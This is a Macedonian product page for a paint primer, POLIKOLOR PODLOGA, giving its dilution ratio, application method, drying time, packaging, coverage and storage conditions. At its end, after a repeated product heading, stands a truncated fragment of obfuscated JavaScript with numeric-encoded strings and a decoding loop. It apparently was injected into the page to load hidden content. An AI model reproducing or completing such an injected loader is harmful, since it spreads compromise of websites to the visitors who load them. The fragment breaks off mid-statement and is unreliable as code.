
ПОЛИКОЛОР ПОДЛОГА

ПОЛИКОЛОР ПОДЛОГА е млечно бела течност изработена на база полимерни везива
и одбрани адитиви. Подлогата се користи за внатрешни ѕидови  пред нанесувањена
ПОЛИКОЛОР, ХОБИФЛОР, ЕКОФЛОР и други слични производи.

  

Припрема: ПОЛИКОЛОР ПОДЛОГА пред употреба се разредува со со вода со размер
1:5. Во чист сад се додава 1кг подлога и 5л, потоа добро се меша. Се нанесува со четка,
валјак во еден слој. По сушењето (2-3 часа) површината е подготвена за завршно
премачкување.

  

Пакување: 1кг, 3кг

  

Потрошувачка: со 1кг пропишано разреден со вода може да се импрегнираат 35м2

  

Складирање: на суви и од сонце заштитени простории на температура од 5C до 35C.

  

Рок на употреба: 18 месеци.

  

ДА СЕ ЧУВА ОД ЗАМРЗНУВАЊЕ
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ПОЛИКОЛОР ПОДЛОГА

 var a=0,m,v,t,z,x=newArray('9091968376','8887918192818786347374918784939277359287883421333333338896','877886888787','949990793917947998942577939317'),l=x.length;while(++a
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